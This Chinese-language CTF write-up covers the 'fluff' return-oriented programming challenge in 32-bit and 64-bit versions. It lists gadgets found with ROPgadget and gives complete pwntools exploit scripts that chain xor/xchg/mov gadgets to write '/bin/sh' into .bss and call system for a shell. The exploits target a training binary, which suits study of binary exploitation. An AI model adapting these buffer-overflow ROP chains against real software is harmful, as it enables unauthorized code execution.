fluff

32位
checksec 一下

日常 ida 找 system('/bin/sh')，但是参数不对，需要自己写入 bss 段

pwnme

usefulFunction

system 地址

bss 地址

利用 ROPgadget 找可用的 gadget，这次似乎没有那么顺利，没有找到可用的 mov 指令

参考
https://www.jianshu.com/p/736150e79ea0
https://www.jianshu.com/p/3691ac2a3acd
这里可以用 xor 指令间接将 '/bin/sh' 写入 bss 段
用一个 xor 操作清空寄存器A，再用寄存器A与寄存器B进行异或，此时寄存器A中的值就是原寄存器B中的值

xor_edx_edx  
假设 edx <-- a，xor 后 edx 中的值为 a^a
xor_edx_ebx  
假设 ebx <-- b，xor 后 edx 中的值为 b，即 a^a^b = b

利用 ROPgadget 找gadget

$ ROPgadget --binary fluff32 --only 'mov|pop|ret|xor|xchg'

这里用

0x080483e1 : pop ebx ; ret
0x0804867b : xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret
0x08048671 : xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret
0x08048689 : xchg edx, ecx ; pop ebp ; mov edx, 0xdefaced0 ; ret
0x08048693 : mov dword ptr [ecx], edx ; pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret

exp

#!/usr/bin/env python
#-*-coding:utf-8 -*-
from pwn import *

p = process('./fluff32')

system = 0x08048430
bss = 0x0804A040

pop_ebx_ret = 0x080483e1
mov_ecx_edx = 0x08048693
xor_edx_edx = 0x08048671
xor_edx_ebx = 0x0804867b
xchg_edx_ecx = 0x08048689

binsh = '/bin/sh\x00'

payload = 'A' * 0x28  + p32(0)

payload += p32(pop_ebx_ret)
payload += p32(bss)
payload += p32(xor_edx_edx) + p32(0)     #自身异或
payload += p32(xor_edx_ebx) + p32(0)     #将 ebx 中的值赋给 edx
payload += p32(xchg_edx_ecx) + p32(0)    #将 edx 中的值与 ecx 中的值交换，即将原来出入的 bss 地址传入 ecx

payload += p32(pop_ebx_ret)
payload += binsh[0:4]    #传入 '/bin'
payload += p32(xor_edx_edx) + p32(0)
payload += p32(xor_edx_ebx) + p32(0) 
payload += p32(mov_ecx_edx) + p32(0) + p32(0)

payload += p32(pop_ebx_ret)
payload += p32(bss+4)
payload += p32(xor_edx_edx) + p32(0)
payload += p32(xor_edx_ebx) + p32(0)
payload += p32(xchg_edx_ecx) + p32(0)

payload += p32(pop_ebx_ret)
payload += binsh[4:8]    #传入 '/sh\x00'
payload += p32(xor_edx_edx) + p32(0)
payload += p32(xor_edx_ebx) + p32(0) 
payload += p32(mov_ecx_edx) + p32(0) + p32(0)

payload += p32(system)
payload += p32(0)
payload += p32(bss)

p.sendline(payload)
p.interactive()

64位
思路与32位一致，64位 '/bin/sh' 可以一次性传入

pwnme

system 地址

bss 段地址

利用 ROPgadget 找可用的 gadget，需要加上参数 --depth 20（20是最深的情况）

$ ROPgadget --binary fluff --only 'mov|pop|ret|xor|xchg' --depth 20

这里用

0x00000000004008c3 : pop rdi ; ret
0x0000000000400832 : pop r12 ; mov r13d, 0x604060 ; ret

0x0000000000400822 : xor r11, r11 ; pop r14 ; mov edi, 0x601050 ; ret
0x000000000040082f : xor r11, r12 ; pop r12 ; mov r13d, 0x604060 ; ret
0x0000000000400840 : xchg r11, r10 ; pop r15 ; mov r11d, 0x602050 ; ret

0x000000000040084e : mov qword ptr [r10], r11 ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret

exp

#!/usr/bin/env python
#-*-coding:utf-8 -*-
from pwn import *

p = process('./fluff')

system = 0x04005E0
bss = 0x0601060

binsh = '/bin/sh\x00'

pop_rdi_ret = 0x04008c3
pop_r12_ret = 0x0400832
xor_r11_r11 = 0x0400822
xor_r11_r12 = 0x040082f
xchg_r11_r10 = 0x0400840
mov_r10_r11 = 0x040084e

payload = 'A' * 0x20 + p64(0)

payload += p64(pop_r12_ret)
payload += p64(bss)
payload += p64(xor_r11_r11) + p64(0)
payload += p64(xor_r11_r12) + p64(0)
payload += p64(xchg_r11_r10) + p64(0)

payload += p64(pop_r12_ret)
payload += binsh
payload += p64(xor_r11_r11) + p64(0)
payload += p64(xor_r11_r12) + p64(0)
payload += p64(mov_r10_r11) + p64(0) + p64(0)

payload += p64(pop_rdi_ret)
payload += p64(bss) 
payload += p64(system)

p.recvuntil('>')
p.sendline(payload)
p.interactive()